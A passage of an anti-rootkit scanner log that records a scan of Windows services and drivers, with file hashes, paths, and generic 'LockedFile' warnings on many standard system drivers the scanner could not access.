23:23:56.0516 0x18fc  lltdio - detected LockedFile.Multi.Generic ( 1 )
23:23:56.0516 0x18fc  Object is SCO, delete is not allowed
23:23:56.0516 0x18fc  lltdio ( LockedFile.Multi.Generic ) - warning
23:23:56.0586 0x18fc  [ C1185803384AB3FEED115F79F109427F, 0414FE73532DCAB17E906438A14711E928CECCD5F579255410C62984DD652700 ] lltdsvc         C:\Windows\System32\lltdsvc.dll
23:23:56.0636 0x18fc  lltdsvc - ok
23:23:56.0686 0x18fc  [ F993A32249B66C9D622EA5592A8B76B8, EE64672A990C6145DC5601E2B8CDBE089272A72732F59AF9865DCBA8B1717E70 ] lmhosts         C:\Windows\System32\lmhsvc.dll
23:23:56.0716 0x18fc  lmhosts - ok
23:23:56.0805 0x18fc  [ 1A93E54EB0ECE102495A51266DCDB6A6, DB6AA86AA36C3A7988BE96E87B5D3251BE7617C54EE8F894D9DC2E267FE3255B ] LSI_FC          C:\Windows\system32\DRIVERS\lsi_fc.sys
23:23:56.0806 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\lsi_fc.sys. md5: 1A93E54EB0ECE102495A51266DCDB6A6, sha256: DB6AA86AA36C3A7988BE96E87B5D3251BE7617C54EE8F894D9DC2E267FE3255B
23:23:56.0806 0x18fc  LSI_FC - detected LockedFile.Multi.Generic ( 1 )
23:23:56.0806 0x18fc  Object is SCO, delete is not allowed
23:23:56.0806 0x18fc  LSI_FC ( LockedFile.Multi.Generic ) - warning
23:23:56.0838 0x18fc  [ 1047184A9FDC8BDBFF857175875EE810, F2251EDB7736A26D388A0C5CC2FE5FB9C5E109CBB1E3800993554CB21D81AE4B ] LSI_SAS         C:\Windows\system32\DRIVERS\lsi_sas.sys
23:23:56.0838 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\lsi_sas.sys. md5: 1047184A9FDC8BDBFF857175875EE810, sha256: F2251EDB7736A26D388A0C5CC2FE5FB9C5E109CBB1E3800993554CB21D81AE4B
23:23:56.0838 0x18fc  LSI_SAS - detected LockedFile.Multi.Generic ( 1 )
23:23:56.0838 0x18fc  Object is SCO, delete is not allowed
23:23:56.0838 0x18fc  LSI_SAS ( LockedFile.Multi.Generic ) - warning
23:23:56.0838 0x18fc  Force sending object to P2P due to detect: LSI_SAS
23:23:56.0838 0x18fc  Object send P2P result: false
23:23:56.0868 0x18fc  [ 30F5C0DE1EE8B5BC9306C1F0E4A75F93, 88D5740A4E9CC3FA80FA18035DAB441BDC5A039622D666BFDAA525CC9686BD06 ] LSI_SAS2        C:\Windows\system32\DRIVERS\lsi_sas2.sys
23:23:56.0868 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\lsi_sas2.sys. md5: 30F5C0DE1EE8B5BC9306C1F0E4A75F93, sha256: 88D5740A4E9CC3FA80FA18035DAB441BDC5A039622D666BFDAA525CC9686BD06
23:23:56.0868 0x18fc  LSI_SAS2 - detected LockedFile.Multi.Generic ( 1 )
23:23:56.0868 0x18fc  LSI_SAS2 ( LockedFile.Multi.Generic ) - warning
23:23:56.0888 0x18fc  [ 0504EACAFF0D3C8AED161C4B0D369D4A, 4D272237C189646F5C80822FD3CBA7C2728E482E2DAAF7A09C8AEF811C89C54D ] LSI_SCSI        C:\Windows\system32\DRIVERS\lsi_scsi.sys
23:23:56.0888 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\lsi_scsi.sys. md5: 0504EACAFF0D3C8AED161C4B0D369D4A, sha256: 4D272237C189646F5C80822FD3CBA7C2728E482E2DAAF7A09C8AEF811C89C54D
23:23:56.0888 0x18fc  LSI_SCSI - detected LockedFile.Multi.Generic ( 1 )
23:23:56.0888 0x18fc  Object is SCO, delete is not allowed
23:23:56.0888 0x18fc  LSI_SCSI ( LockedFile.Multi.Generic ) - warning
23:23:56.0915 0x18fc  [ 43D0F98E1D56CCDDB0D5254CFF7B356E, 5BA498183B5C4996C694CB0A9A6B66CE6C7A460F6C91BEB9F305486FCC3B7B22 ] luafv           C:\Windows\system32\drivers\luafv.sys
23:23:56.0915 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\luafv.sys. md5: 43D0F98E1D56CCDDB0D5254CFF7B356E, sha256: 5BA498183B5C4996C694CB0A9A6B66CE6C7A460F6C91BEB9F305486FCC3B7B22
23:23:56.0916 0x18fc  luafv - detected LockedFile.Multi.Generic ( 1 )
23:23:56.0916 0x18fc  Object is SCO, delete is not allowed
23:23:56.0916 0x18fc  luafv ( LockedFile.Multi.Generic ) - warning
23:23:56.0916 0x18fc  Force sending object to P2P due to detect: luafv
23:23:56.0917 0x18fc  Object send P2P result: false
23:23:57.0000 0x18fc  [ F84C8F1000BC11E3B7B23CBD3BAFF111, BB4C4FFE3F6C9E5C16C06F6F666F177B94E1CF878397BCC0BDAF6EB3341AAED8 ] Mcx2Svc         C:\Windows\system32\Mcx2Svc.dll
23:23:57.0049 0x18fc  Mcx2Svc - ok
23:23:57.0078 0x18fc  [ A55805F747C6EDB6A9080D7C633BD0F4, 2DA0E83BF3C8ADEF6F551B6CC1C0A3F6149CDBE6EC60413BA1767C4DE425A728 ] megasas         C:\Windows\system32\DRIVERS\megasas.sys
23:23:57.0078 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\megasas.sys. md5: A55805F747C6EDB6A9080D7C633BD0F4, sha256: 2DA0E83BF3C8ADEF6F551B6CC1C0A3F6149CDBE6EC60413BA1767C4DE425A728
23:23:57.0078 0x18fc  megasas - detected LockedFile.Multi.Generic ( 1 )
23:23:57.0078 0x18fc  Object is SCO, delete is not allowed
23:23:57.0078 0x18fc  megasas ( LockedFile.Multi.Generic ) - warning
23:23:57.0140 0x18fc  [ BAF74CE0072480C3B6B7C13B2A94D6B3, 85CBB4949C090A904464F79713A3418338753D20D7FB811E68F287FDAC1DD834 ] MegaSR          C:\Windows\system32\DRIVERS\MegaSR.sys
23:23:57.0140 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\MegaSR.sys. md5: BAF74CE0072480C3B6B7C13B2A94D6B3, sha256: 85CBB4949C090A904464F79713A3418338753D20D7FB811E68F287FDAC1DD834
23:23:57.0140 0x18fc  MegaSR - detected LockedFile.Multi.Generic ( 1 )
23:23:57.0140 0x18fc  Object is SCO, delete is not allowed
23:23:57.0140 0x18fc  MegaSR ( LockedFile.Multi.Generic ) - warning
23:23:57.0140 0x18fc  Force sending object to P2P due to detect: MegaSR
23:23:57.0140 0x18fc  Object send P2P result: false
23:23:57.0474 0x18fc  Microsoft SharePoint Workspace Audit Service - ok
23:23:57.0514 0x18fc  [ E40E80D0304A73E8D269F7141D77250B, 0DB4AC13A264F19A84DC0BCED54E8E404014CC09C993B172002B1561EC7E265A ] MMCSS           C:\Windows\system32\mmcss.dll
23:23:57.0584 0x18fc  MMCSS - ok
23:23:57.0664 0x18fc  [ 800BA92F7010378B09F9ED9270F07137, 94F9AF9E1BE80AE6AC39A2A74EF9FAB115DCAACC011D07DFA8D6A1DDC8A93342 ] Modem           C:\Windows\system32\drivers\modem.sys
23:23:57.0664 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\modem.sys. md5: 800BA92F7010378B09F9ED9270F07137, sha256: 94F9AF9E1BE80AE6AC39A2A74EF9FAB115DCAACC011D07DFA8D6A1DDC8A93342
23:23:57.0664 0x18fc  Modem - detected LockedFile.Multi.Generic ( 1 )
23:23:57.0664 0x18fc  Object is SCO, delete is not allowed
23:23:57.0664 0x18fc  Modem ( LockedFile.Multi.Generic ) - warning
23:23:57.0664 0x18fc  Force sending object to P2P due to detect: Modem
23:23:57.0664 0x18fc  Object send P2P result: false
23:23:57.0714 0x18fc  [ B03D591DC7DA45ECE20B3B467E6AADAA, 701FB0CAD8138C58507BE28845D3E24CE269A040737C29885944A0D851238732 ] monitor         C:\Windows\system32\DRIVERS\monitor.sys
23:23:57.0714 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\monitor.sys. md5: B03D591DC7DA45ECE20B3B467E6AADAA, sha256: 701FB0CAD8138C58507BE28845D3E24CE269A040737C29885944A0D851238732
23:23:57.0714 0x18fc  monitor - detected LockedFile.Multi.Generic ( 1 )
23:23:57.0714 0x18fc  Object is SCO, delete is not allowed
23:23:57.0714 0x18fc  monitor ( LockedFile.Multi.Generic ) - warning
23:23:57.0714 0x18fc  Force sending object to P2P due to detect: monitor
23:23:57.0714 0x18fc  Object send P2P result: false
23:23:57.0784 0x18fc  [ 7D27EA49F3C1F687D357E77A470AEA99, 7FE7CAF95959F127C6D932C01D539C06D80273C49A09761F6E8331C05B1A7EE7 ] mouclass        C:\Windows\system32\DRIVERS\mouclass.sys
23:23:57.0784 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\mouclass.sys. md5: 7D27EA49F3C1F687D357E77A470AEA99, sha256: 7FE7CAF95959F127C6D932C01D539C06D80273C49A09761F6E8331C05B1A7EE7
23:23:57.0784 0x18fc  mouclass - detected LockedFile.Multi.Generic ( 1 )
23:23:57.0784 0x18fc  Object is SCO, delete is not allowed
23:23:57.0784 0x18fc  mouclass ( LockedFile.Multi.Generic ) - warning
23:23:57.0896 0x18fc  [ D3BF052C40B0C4166D9FD86A4288C1E6, 5E65264354CD94E844BF1838CA1B8E49080EFA34605A32CF2F6A47A2B97FC183 ] mouhid          C:\Windows\system32\DRIVERS\mouhid.sys
23:23:57.0896 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\mouhid.sys. md5: D3BF052C40B0C4166D9FD86A4288C1E6, sha256: 5E65264354CD94E844BF1838CA1B8E49080EFA34605A32CF2F6A47A2B97FC183
23:23:57.0896 0x18fc  mouhid - detected LockedFile.Multi.Generic ( 1 )
23:23:57.0896 0x18fc  Object is SCO, delete is not allowed
23:23:57.0896 0x18fc  mouhid ( LockedFile.Multi.Generic ) - warning
23:23:57.0896 0x18fc  Force sending object to P2P due to detect: mouhid
23:23:57.0896 0x18fc  Object send P2P result: false
23:23:57.0906 0x18fc  [ 791AF66C4D0E7C90A3646066386FB571, BF67643099494AEADDDC85E4D97AFF1017806A1DF554F9BE6C864FFECC9EAF42 ] mountmgr        C:\Windows\system32\drivers\mountmgr.sys
23:23:57.0906 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\mountmgr.sys. md5: 791AF66C4D0E7C90A3646066386FB571, sha256: BF67643099494AEADDDC85E4D97AFF1017806A1DF554F9BE6C864FFECC9EAF42
23:23:57.0906 0x18fc  mountmgr - detected LockedFile.Multi.Generic ( 1 )
23:23:57.0906 0x18fc  Object is SCO, delete is not allowed
23:23:57.0906 0x18fc  mountmgr ( LockedFile.Multi.Generic ) - warning
23:23:57.0966 0x18fc  [ 609D1D87649ECC19796F4D76D4C15CEA, 5369F4C83FBAE9C4CFB9ACD36F07479E3F3FD784D79B82AE8D95B818B9F9CE00 ] mpio            C:\Windows\system32\DRIVERS\mpio.sys
23:23:57.0966 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\mpio.sys. md5: 609D1D87649ECC19796F4D76D4C15CEA, sha256: 5369F4C83FBAE9C4CFB9ACD36F07479E3F3FD784D79B82AE8D95B818B9F9CE00
23:23:57.0966 0x18fc  mpio - detected LockedFile.Multi.Generic ( 1 )
23:23:57.0966 0x18fc  Object is SCO, delete is not allowed
23:23:57.0966 0x18fc  mpio ( LockedFile.Multi.Generic ) - warning
23:23:57.0996 0x18fc  [ 6C38C9E45AE0EA2FA5E551F2ED5E978F, 5A3FA2F110029CB4CC4384998EDB59203FDD65EC45E01B897FB684F8956EAD20 ] mpsdrv          C:\Windows\system32\drivers\mpsdrv.sys
23:23:57.0996 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\mpsdrv.sys. md5: 6C38C9E45AE0EA2FA5E551F2ED5E978F, sha256: 5A3FA2F110029CB4CC4384998EDB59203FDD65EC45E01B897FB684F8956EAD20
23:23:57.0996 0x18fc  mpsdrv - detected LockedFile.Multi.Generic ( 1 )
23:23:57.0996 0x18fc  Object is SCO, delete is not allowed
23:23:57.0996 0x18fc  mpsdrv ( LockedFile.Multi.Generic ) - warning
23:23:58.0216 0x18fc  [ AECAB449567D1846DAD63ECE49E893E3, 7A67A16A3E04574B7CAD097632ABA9B361BBEFDD6B36B7B8E3A1996EC529C2DC ] MpsSvc          C:\Windows\system32\mpssvc.dll
23:23:58.0266 0x18fc  MpsSvc - ok
23:23:58.0316 0x18fc  [ 30524261BB51D96D6FCBAC20C810183C, 19598A9CD0EAAE4ACBF1069E721AB2853452F33FCFB3B5113F023A88A90BF42D ] MRxDAV          C:\Windows\system32\drivers\mrxdav.sys
23:23:58.0316 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\mrxdav.sys. md5: 30524261BB51D96D6FCBAC20C810183C, sha256: 19598A9CD0EAAE4ACBF1069E721AB2853452F33FCFB3B5113F023A88A90BF42D
23:23:58.0316 0x18fc  MRxDAV - detected LockedFile.Multi.Generic ( 1 )
23:23:58.0316 0x18fc  Object is SCO, delete is not allowed
23:23:58.0316 0x18fc  MRxDAV ( LockedFile.Multi.Generic ) - warning
23:23:58.0316 0x18fc  Force sending object to P2P due to detect: MRxDAV
23:23:58.0316 0x18fc  Object send P2P result: false
23:23:58.0446 0x18fc  [ 767A4C3BCF9410C286CED15A2DB17108, D9EA9EF7D4048081B132B804E0AE5A60A58FA6B25B7F5B87D5D7E354B2D94C79 ] mrxsmb          C:\Windows\system32\DRIVERS\mrxsmb.sys
23:23:58.0446 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\mrxsmb.sys. md5: 767A4C3BCF9410C286CED15A2DB17108, sha256: D9EA9EF7D4048081B132B804E0AE5A60A58FA6B25B7F5B87D5D7E354B2D94C79
23:23:58.0446 0x18fc  mrxsmb - detected LockedFile.Multi.Generic ( 1 )
23:23:58.0446 0x18fc  Object is SCO, delete is not allowed
23:23:58.0446 0x18fc  mrxsmb ( LockedFile.Multi.Generic ) - warning
23:23:58.0446 0x18fc  Force sending object to P2P due to detect: mrxsmb
23:23:58.0446 0x18fc  Object send P2P result: false
23:23:58.0566 0x18fc  [ 920EE0FF995FCFDEB08C41605A959E1C, 977195011912166F7C7E209D90B973E3F507B5297504AF9B6797FA8D1051534C ] mrxsmb10        C:\Windows\system32\DRIVERS\mrxsmb10.sys
23:23:58.0566 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\mrxsmb10.sys. md5: 920EE0FF995FCFDEB08C41605A959E1C, sha256: 977195011912166F7C7E209D90B973E3F507B5297504AF9B6797FA8D1051534C
23:23:58.0576 0x18fc  mrxsmb10 - detected LockedFile.Multi.Generic ( 1 )
23:23:58.0576 0x18fc  Object is SCO, delete is not allowed
23:23:58.0576 0x18fc  mrxsmb10 ( LockedFile.Multi.Generic ) - warning
23:23:58.0616 0x18fc  [ 740D7EA9D72C981510A5292CF6ADC941, C55C2F73410C008F829D194EF072721A8D7945BCC48458982D2409761908E7AE ] mrxsmb20        C:\Windows\system32\DRIVERS\mrxsmb20.sys
23:23:58.0616 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\mrxsmb20.sys. md5: 740D7EA9D72C981510A5292CF6ADC941, sha256: C55C2F73410C008F829D194EF072721A8D7945BCC48458982D2409761908E7AE
23:23:58.0626 0x18fc  mrxsmb20 - detected LockedFile.Multi.Generic ( 1 )
23:23:58.0626 0x18fc  Object is SCO, delete is not allowed
23:23:58.0626 0x18fc  mrxsmb20 ( LockedFile.Multi.Generic ) - warning
23:23:58.0626 0x18fc  Force sending object to P2P due to detect: mrxsmb20
23:23:58.0626 0x18fc  Object send P2P result: false
23:23:58.0716 0x18fc  [ 5C37497276E3B3A5488B23A326A754B7, 9982FCDAFB963868EB93A4DEF811A3167488EB5246BAC3F4AE960506FDF63967 ] msahci          C:\Windows\system32\DRIVERS\msahci.sys
23:23:58.0716 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\msahci.sys. md5: 5C37497276E3B3A5488B23A326A754B7, sha256: 9982FCDAFB963868EB93A4DEF811A3167488EB5246BAC3F4AE960506FDF63967
23:23:58.0716 0x18fc  msahci - detected LockedFile.Multi.Generic ( 1 )
23:23:58.0716 0x18fc  Object is SCO, delete is not allowed
23:23:58.0716 0x18fc  msahci ( LockedFile.Multi.Generic ) - warning
23:23:58.0866 0x18fc  [ 8D27B597229AED79430FB9DB3BCBFBD0, 3D58E08B47E8AE419D405BF263929DFA6F2F5F0C2D79FD8D6F2CED6452F6F248 ] msdsm           C:\Windows\system32\DRIVERS\msdsm.sys
23:23:58.0866 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\msdsm.sys. md5: 8D27B597229AED79430FB9DB3BCBFBD0, sha256: 3D58E08B47E8AE419D405BF263929DFA6F2F5F0C2D79FD8D6F2CED6452F6F248
23:23:58.0866 0x18fc  msdsm - detected LockedFile.Multi.Generic ( 1 )
23:23:58.0866 0x18fc  Object is SCO, delete is not allowed
23:23:58.0866 0x18fc  msdsm ( LockedFile.Multi.Generic ) - warning
23:23:58.0896 0x18fc  [ DE0ECE52236CFA3ED2DBFC03F28253A8, 2FBBEC4CACB5161F68D7C2935852A5888945CA0F107CF8A1C01F4528CE407DE3 ] MSDTC           C:\Windows\System32\msdtc.exe
23:23:58.0946 0x18fc  MSDTC - ok
23:23:58.0976 0x18fc  [ AA3FB40E17CE1388FA1BEDAB50EA8F96, 69F93E15536644C8FD679A20190CFE577F4985D3B1B4A4AA250A168615AE1E99 ] Msfs            C:\Windows\system32\drivers\Msfs.sys
23:23:58.0976 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\Msfs.sys. md5: AA3FB40E17CE1388FA1BEDAB50EA8F96, sha256: 69F93E15536644C8FD679A20190CFE577F4985D3B1B4A4AA250A168615AE1E99
23:23:58.0976 0x18fc  Msfs - detected LockedFile.Multi.Generic ( 1 )
23:23:58.0986 0x18fc  Object is SCO, delete is not allowed
23:23:58.0986 0x18fc  Msfs ( LockedFile.Multi.Generic ) - warning
23:23:58.0986 0x18fc  Force sending object to P2P due to detect: Msfs
23:23:58.0986 0x18fc  Object send P2P result: false
23:23:59.0006 0x18fc  [ F9D215A46A8B9753F61767FA72A20326, 6F76642B45E0A7EF6BCAB8B37D55CCE2EAA310ED07B76D43FCB88987C2174141 ] mshidkmdf       C:\Windows\System32\drivers\mshidkmdf.sys
23:23:59.0006 0x18fc  Suspicious file ( NoAccess ): C:\Windows\System32\drivers\mshidkmdf.sys. md5: F9D215A46A8B9753F61767FA72A20326, sha256: 6F76642B45E0A7EF6BCAB8B37D55CCE2EAA310ED07B76D43FCB88987C2174141
23:23:59.0006 0x18fc  mshidkmdf - detected LockedFile.Multi.Generic ( 1 )
23:23:59.0006 0x18fc  mshidkmdf ( LockedFile.Multi.Generic ) - warning
23:23:59.0006 0x18fc  Force sending object to P2P due to detect: mshidkmdf
23:23:59.0006 0x18fc  Object send P2P result: false
23:23:59.0136 0x18fc  [ D916874BBD4F8B07BFB7FA9B3CCAE29D, B229DA150713DEDBC4F05386C9D9DC3BC095A74F44F3081E88311AB73BC992A1 ] msisadrv        C:\Windows\system32\DRIVERS\msisadrv.sys
23:23:59.0136 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\msisadrv.sys. md5: D916874BBD4F8B07BFB7FA9B3CCAE29D, sha256: B229DA150713DEDBC4F05386C9D9DC3BC095A74F44F3081E88311AB73BC992A1
23:23:59.0136 0x18fc  msisadrv - detected LockedFile.Multi.Generic ( 1 )
23:23:59.0136 0x18fc  Object is SCO, delete is not allowed
23:23:59.0136 0x18fc  msisadrv ( LockedFile.Multi.Generic ) - warning
23:23:59.0136 0x18fc  Force sending object to P2P due to detect: msisadrv
23:23:59.0136 0x18fc  Object send P2P result: false
23:23:59.0206 0x18fc  [ 808E98FF49B155C522E6400953177B08, F873F5BFF0984C5165DF67E92874D3F6EB8D86F9B5AD17013A0091CA33A1A3D5 ] MSiSCSI         C:\Windows\system32\iscsiexe.dll
23:23:59.0308 0x18fc  MSiSCSI - ok
23:23:59.0308 0x18fc  msiserver - ok
23:23:59.0358 0x18fc  [ 49CCF2C4FEA34FFAD8B1B59D49439366, E5752EA57C7BDAD5F53E3BC441A415E909AC602CAE56234684FB8789A20396C7 ] MSKSSRV         C:\Windows\system32\drivers\MSKSSRV.sys
23:23:59.0358 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\MSKSSRV.sys. md5: 49CCF2C4FEA34FFAD8B1B59D49439366, sha256: E5752EA57C7BDAD5F53E3BC441A415E909AC602CAE56234684FB8789A20396C7
23:23:59.0358 0x18fc  MSKSSRV - detected LockedFile.Multi.Generic ( 1 )
23:23:59.0358 0x18fc  Object is SCO, delete is not allowed
23:23:59.0358 0x18fc  MSKSSRV ( LockedFile.Multi.Generic ) - warning
23:23:59.0358 0x18fc  Force sending object to P2P due to detect: MSKSSRV
23:23:59.0358 0x18fc  Object send P2P result: false
23:23:59.0430 0x18fc  [ BDD71ACE35A232104DDD349EE70E1AB3, 27464A66868513BE6A01B75D7FC5B0D6B71842E4E20CE3F76B15C071A0618BBB ] MSPCLOCK        C:\Windows\system32\drivers\MSPCLOCK.sys
23:23:59.0430 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\MSPCLOCK.sys. md5: BDD71ACE35A232104DDD349EE70E1AB3, sha256: 27464A66868513BE6A01B75D7FC5B0D6B71842E4E20CE3F76B15C071A0618BBB
23:23:59.0430 0x18fc  MSPCLOCK - detected LockedFile.Multi.Generic ( 1 )
23:23:59.0430 0x18fc  Object is SCO, delete is not allowed
23:23:59.0430 0x18fc  MSPCLOCK ( LockedFile.Multi.Generic ) - warning
23:23:59.0430 0x18fc  Force sending object to P2P due to detect: MSPCLOCK
23:23:59.0430 0x18fc  Object send P2P result: false
23:23:59.0440 0x18fc  [ 4ED981241DB27C3383D72092B618A1D0, E12F121E641249DB3491141851B59E1496F4413EDF58E863388F1C229838DFCC ] MSPQM           C:\Windows\system32\drivers\MSPQM.sys
23:23:59.0440 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\MSPQM.sys. md5: 4ED981241DB27C3383D72092B618A1D0, sha256: E12F121E641249DB3491141851B59E1496F4413EDF58E863388F1C229838DFCC
23:23:59.0440 0x18fc  MSPQM - detected LockedFile.Multi.Generic ( 1 )
23:23:59.0450 0x18fc  Object is SCO, delete is not allowed
23:23:59.0450 0x18fc  MSPQM ( LockedFile.Multi.Generic ) - warning
23:23:59.0450 0x18fc  Force sending object to P2P due to detect: MSPQM
23:23:59.0450 0x18fc  Object send P2P result: false
23:23:59.0500 0x18fc  [ 89CB141AA8616D8C6A4610FA26C60964, 76E72F6A0348EDC58A8E6F88C7F024B8B077670400BD5A833811DAFCF9F517CC ] MsRPC           C:\Windows\system32\drivers\MsRPC.sys
23:23:59.0501 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\MsRPC.sys. md5: 89CB141AA8616D8C6A4610FA26C60964, sha256: 76E72F6A0348EDC58A8E6F88C7F024B8B077670400BD5A833811DAFCF9F517CC
23:23:59.0501 0x18fc  MsRPC - detected LockedFile.Multi.Generic ( 1 )
23:23:59.0501 0x18fc  Object is SCO, delete is not allowed
23:23:59.0501 0x18fc  MsRPC ( LockedFile.Multi.Generic ) - warning
23:23:59.0547 0x18fc  [ 0EED230E37515A0EAEE3C2E1BC97B288, B1D8F8A75006B6E99214CA36D27A8594EF8D952F315BEB201E9BAC9DE3E64D42 ] mssmbios        C:\Windows\system32\DRIVERS\mssmbios.sys
23:23:59.0547 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\mssmbios.sys. md5: 0EED230E37515A0EAEE3C2E1BC97B288, sha256: B1D8F8A75006B6E99214CA36D27A8594EF8D952F315BEB201E9BAC9DE3E64D42
23:23:59.0547 0x18fc  mssmbios - detected LockedFile.Multi.Generic ( 1 )
23:23:59.0547 0x18fc  Object is SCO, delete is not allowed
23:23:59.0547 0x18fc  mssmbios ( LockedFile.Multi.Generic ) - warning
23:23:59.0548 0x18fc  Force sending object to P2P due to detect: mssmbios
23:23:59.0549 0x18fc  Object send P2P result: false
23:23:59.0572 0x18fc  [ 2E66F9ECB30B4221A318C92AC2250779, DF175E1AB6962303E57F26DAE5C5C1E40B8640333F3E352A64F6A5F1301586CD ] MSTEE           C:\Windows\system32\drivers\MSTEE.sys
23:23:59.0572 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\MSTEE.sys. md5: 2E66F9ECB30B4221A318C92AC2250779, sha256: DF175E1AB6962303E57F26DAE5C5C1E40B8640333F3E352A64F6A5F1301586CD
23:23:59.0572 0x18fc  MSTEE - detected LockedFile.Multi.Generic ( 1 )
23:23:59.0573 0x18fc  Object is SCO, delete is not allowed
23:23:59.0573 0x18fc  MSTEE ( LockedFile.Multi.Generic ) - warning
23:23:59.0602 0x18fc  [ 7EA404308934E675BFFDE8EDF0757BCD, 306CD02D89CFCFE576242360ED5F9EEEDCAFC43CD43B7D2977AE960F9AEC3232 ] MTConfig        C:\Windows\system32\DRIVERS\MTConfig.sys
23:23:59.0602 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\MTConfig.sys. md5: 7EA404308934E675BFFDE8EDF0757BCD, sha256: 306CD02D89CFCFE576242360ED5F9EEEDCAFC43CD43B7D2977AE960F9AEC3232
23:23:59.0602 0x18fc  MTConfig - detected LockedFile.Multi.Generic ( 1 )
23:23:59.0602 0x18fc  MTConfig ( LockedFile.Multi.Generic ) - warning
23:23:59.0602 0x18fc  Force sending object to P2P due to detect: MTConfig
23:23:59.0602 0x18fc  Object send P2P result: false
23:23:59.0652 0x18fc  [ F9A18612FD3526FE473C1BDA678D61C8, 32F7975B5BAA447917F832D9E3499B4B6D3E90D73F478375D0B70B36C524693A ] Mup             C:\Windows\system32\Drivers\mup.sys
23:23:59.0652 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\Drivers\mup.sys. md5: F9A18612FD3526FE473C1BDA678D61C8, sha256: 32F7975B5BAA447917F832D9E3499B4B6D3E90D73F478375D0B70B36C524693A
23:23:59.0652 0x18fc  Mup - detected LockedFile.Multi.Generic ( 1 )
23:23:59.0652 0x18fc  Object is SCO, delete is not allowed
23:23:59.0652 0x18fc  Mup ( LockedFile.Multi.Generic ) - warning
23:23:59.0652 0x18fc  Force sending object to P2P due to detect: Mup
23:23:59.0652 0x18fc  Object send P2P result: false
23:23:59.0792 0x18fc  [ 4987E079A4530FA737A128BE54B63B12, 27E51CC7D4D90DC4397575491DE7EFE15808709F097E2828E46AA73C771A47A4 ] napagent        C:\Windows\system32\qagentRT.dll
23:23:59.0852 0x18fc  napagent - ok
23:23:59.0932 0x18fc  [ 1EA3749C4114DB3E3161156FFFFA6B33, 54C2E77BCE1037711A11313AC25B8706109098C10A31AA03AEB7A185E97800D7 ] NativeWifiP     C:\Windows\system32\DRIVERS\nwifi.sys
23:23:59.0932 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\nwifi.sys. md5: 1EA3749C4114DB3E3161156FFFFA6B33, sha256: 54C2E77BCE1037711A11313AC25B8706109098C10A31AA03AEB7A185E97800D7
23:23:59.0952 0x18fc  NativeWifiP - detected LockedFile.Multi.Generic ( 1 )
23:23:59.0952 0x18fc  Object is SCO, delete is not allowed
23:23:59.0952 0x18fc  NativeWifiP ( LockedFile.Multi.Generic ) - warning
23:24:00.0012 0x18fc  [ CAD515DBD07D082BB317D9928CE8962C, 7AFA6D6154AC68F9FCC37B7B3324F7A170AE91035805026445F24F6EB4FB7F2E ] NDIS            C:\Windows\system32\drivers\ndis.sys
23:24:00.0012 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\ndis.sys. md5: CAD515DBD07D082BB317D9928CE8962C, sha256: 7AFA6D6154AC68F9FCC37B7B3324F7A170AE91035805026445F24F6EB4FB7F2E
23:24:00.0012 0x18fc  NDIS - detected LockedFile.Multi.Generic ( 1 )
23:24:00.0012 0x18fc  Object is SCO, delete is not allowed
23:24:00.0012 0x18fc  NDIS ( LockedFile.Multi.Generic ) - warning
23:24:00.0032 0x18fc  [ 9F9A1F53AAD7DA4D6FEF5BB73AB811AC, D7E5446E83909AE25506BB98FBDD878A529C87963E3C1125C4ABAB25823572BC ] NdisCap         C:\Windows\system32\DRIVERS\ndiscap.sys
23:24:00.0032 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\ndiscap.sys. md5: 9F9A1F53AAD7DA4D6FEF5BB73AB811AC, sha256: D7E5446E83909AE25506BB98FBDD878A529C87963E3C1125C4ABAB25823572BC
23:24:00.0032 0x18fc  NdisCap - detected LockedFile.Multi.Generic ( 1 )
23:24:00.0032 0x18fc  NdisCap ( LockedFile.Multi.Generic ) - warning
23:24:00.0032 0x18fc  Force sending object to P2P due to detect: NdisCap
23:24:00.0042 0x18fc  Object send P2P result: false
23:24:00.0062 0x18fc  [ 30639C932D9FEF22B31268FE25A1B6E5, 32873D95339600F6EEFA51847D12C563FF01F320DC59055B242FA2887C99F9D6 ] NdisTapi        C:\Windows\system32\DRIVERS\ndistapi.sys
23:24:00.0062 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\ndistapi.sys. md5: 30639C932D9FEF22B31268FE25A1B6E5, sha256: 32873D95339600F6EEFA51847D12C563FF01F320DC59055B242FA2887C99F9D6
23:24:00.0062 0x18fc  NdisTapi - detected LockedFile.Multi.Generic ( 1 )
